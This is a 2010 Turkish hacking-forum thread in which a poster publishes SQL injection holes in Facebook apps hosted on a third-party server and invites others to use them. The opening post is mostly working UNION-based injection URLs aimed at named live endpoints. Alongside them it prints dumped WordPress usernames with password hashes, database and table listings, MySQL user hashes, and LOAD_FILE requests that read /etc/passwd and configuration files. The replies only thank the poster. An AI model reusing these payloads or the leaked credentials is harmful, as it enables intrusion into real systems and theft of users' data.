İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

Facebook Server Sql İnjection

19-09-2010 18:09
#1
Üyelik tarihi:
06/2010
Mesajlar:
40
Teşekkür (Etti):
0
Teşekkür (Aldı):
20
Konular:
16
Ticaret:
(0) %
Merhabalar Komutanlarım ve astlarım.Tam hatırlayamıyorum geçen günlerde bir konuda istersem Facebook Hackleyebilirim demiştim.Hacklemedim ama sql açıklarını buldum şimdi onları yayınlıyorum yapmak isteyenlere izin veriyorum.


;===== BASIC INFO
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,CONCAT_ WS(CHAR(32,58,32),user(),database(),version()),3,4--+1

;===== LIST TABLES
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,c oncat(table_schema,0x3a,table_name),6,7,8,9,10+FRO M+information_schema.tables+WHERE+table_schema+!= 0x6d7973716c+AND+table_schema+!=+0x696e666f726d617 4696f6e5f736368656d61--+1

;===== LIST COLUMNS
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,c oncat(table_schema,0x3a,table_name,0x3a,column_nam e),6,7,8,9,10+FROM+information_schema.columns+WHER E+table_schema+!= 0x6d7973716c+AND+table_schema+!=+0x696e666f726d617 4696f6e5f736368656d61--+1

;===== LIST WORDPRESS USERS/PASS
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,c oncat(user_login,0x3a,user_pass),6,7,8,9,10+from+c andukincaid.wp_users--+1

admin:$P$BQFUeKJK810OT9Y/Hmcx/hZdaRBEmw/
lucia:$P$BqEFbcc1.uPFB8SfIIDcmVq7pc40WK.
tom:$P$BlBjwW.57R/lHuoGLSUyAutopYdoEt/

-----

http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,c oncat(user_login,0x3a,user_pass),6,7,8,9,10+from+c hurchwpdb.wp_users--+1

admin:$P$B6RRs18hNYnYWPgNy0brmY/qPg3W7b.
test:$P$BuuuSp.VN0Ha5/p11u20ATdWqeEk

-----

http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,c oncat(user_login,0x3a,user_pass),6,7,8,9,10+from+l uciacanduwp.wp_users--

admin:$P$B1jGLGuDkN6gNT68q92h3RG3wG4qwi/
lucia:$P$BBtUst3KjOqCdTNVVTGdWlgayz

################
# INFORMATIONS #
################
;===== PATH
/home/tomkincaid/tomkincaid.dreamhosters.com/facebookclient/shared_lib.php

;===== BASIC INFO
tomkincaid@ps5008.dreamhost.com
politicsapp
5.0.45-log

;===== TABLES

# astro
** app
** oscache
** user


# candukincaid
** wp_comment****
** wp_comments
** wp_links
** wp_options
** wp_post****
** wp_posts
** wp_px_albumPhotos
** wp_px_albums
** wp_px_galleries
** wp_px_photos
** wp_px_plugins
** wp_term_relationships
** wp_term_taxonomy
** wp_terms
** wp_user****
** wp_users

# cemeteries
** AmazonItem
** AmazonType
** CameraType
** Format
** Guestbook
** Links
** Photo
** Scan

# churchwpdb
** wp_comments
** eventscalendar_main
** icl_languages
** icl_languages_translations
** icl_locale_map
** icl_translations
** links
** options
** post****
** posts
** term_relationships
** term_taxonomy
** terms
** user****
** users

# countdownapp
** oscache
** user

# crush
** couple
** oscache
** user

# dare
** flag
** game
** item
** user

# friendiq
** oscache
** score
** user

# giants
** app
** league
** media
** mediaforuser
** oscache
** post
** team
** topic
** user

# hookup
** couple
** neverblue
** oscache
** user

# jauntlet
** user

# loccus
** checkin
** oscache
** user

# luciacanduwp
** wp_comments
** wp_links
** wp_options
** wp_post****
** wp_posts
** wp_term_relationships
** wp_term_taxonomy
** wp_terms
** wp_user****
** wp_users

# maps
** place
** user

# martisor
** user

# mediax
** oscache
** user

# mostlikely
** callback
** statement
** statementforuser
** user

# music
** itemforuser
** oscache
** user

# pimpfriends
** activity
** ad
** favorite
** gift
** giftforho
** hoforpimp
** johnforho
** oscache
** permission
** photoforuser
** room
** user
** wall
** whistle

# plans
** attend
** cache
** event
** place
** user

# politicsapp
** app
** badge
** badgeforuser
** issue
** oscache
** position
** positionforuser
** post
** user

# postergifts
** category
** categoryproduct
** categoryrelationship
** image
** oscache
** posterforuser
** user

# posters2
** category
** categoryproduct
** categoryrelationship
** image
** oscache
** posterforuser
** user

# projectbasecamp
** clicktimeproject
** clicktimereport
** clickti****sk
** idcorrelation
** projectbudget
** taskforuser
** user

# pwnfriends
** photo
** photoforfriend
** photoforuser
** user

# quiz
** app
** question
** quiz
** result
** resultforquestion
** resultforuser
** user

# seeall
** network
** networkforuser
** test2
** userpref

# send
** app
** item
** itemforuser
** neverblue
** user

# supporter
** oscache
** user

# swapu
** item
** itemforuser
** network
** networkforuser
** swaptype
** user

# tomsapps
** ad
** adclick
** app
** contest
** notification

# travelbug
** bug
** bugcache
** user

# tv
** app
** oscache
** post
** series
** seriesforuser
** thread
** threadforuser
** user

# wikitravel
** badmap
** wikitravelimage
** wikitravelpage


---------------------------------------------------------------------------------------------------------------------------------------------------

load_file = yes magic_quotes = off

  • Gathering MySQL Server Configuration...
Database: facebook
User: root@localhost
Version: 5.1.37-1ubuntu5.4

  • Do we have Access to MySQL Database: YES <-- w00t w00t
  • Dumping MySQL user info. userassword:host
  • Number of users in the mysql.user table: 4[0] root::localhost
    [1] root::ip-10-128-57-239
    [2] root::127.0.0.1
    [3] debian-sys-maint:*79E5005DD3B60F9100ACF7571D5DC9079388F408:lo calhost

  • Do we have Access to Load_File: YES <-- w00t w00t
  • Starting Load_File Fuzzer...
  • Number of tables names to be fuzzed: 236[!] Found /etc/passwd
    [!]
http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2 ,3,4,5,LOAD_FILE('/etc/passwd'),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30--
[!] Found /etc/hosts
[!] http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2 ,3,4,5,LOAD_FILE('/etc/hosts'),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30--
[!] Found /etc/mysql/my.cnf
[!] http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2 ,3,4,5,LOAD_FILE('/etc/mysql/my.cnf'),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30--
[!] Found /etc/group
[!] http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2 ,3,4,5,LOAD_FILE('/etc/group'),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30--

19-09-2010 20:59
#2
Üyelik tarihi:
05/2010
Nereden:
FF
Mesajlar:
1.861
Teşekkür (Etti):
102
Teşekkür (Aldı):
463
Konular:
572
Ticaret:
(0) %
Paylaşım için TeşekkürLer asteğmenim..!
ReLaXKinG Teşekkür etti.
19-09-2010 21:02
#3
ar£S - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2009
Mesajlar:
5.666
Teşekkür (Etti):
234
Teşekkür (Aldı):
662
Konular:
3397
Ticaret:
(0) %
hı hı tabi ihbar //
set_maq Teşekkür etti.
19-09-2010 21:06
#4
Üyelik tarihi:
05/2010
Nereden:
FF
Mesajlar:
1.861
Teşekkür (Etti):
102
Teşekkür (Aldı):
463
Konular:
572
Ticaret:
(0) %
Alıntı:
ar£S´isimli üyeden Alıntı Mesajı göster
hı hı tabi ihbar //

Zuhahahaha xDxDxD
ReLaXKinG, CaSFeRs Teşekkür etti.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı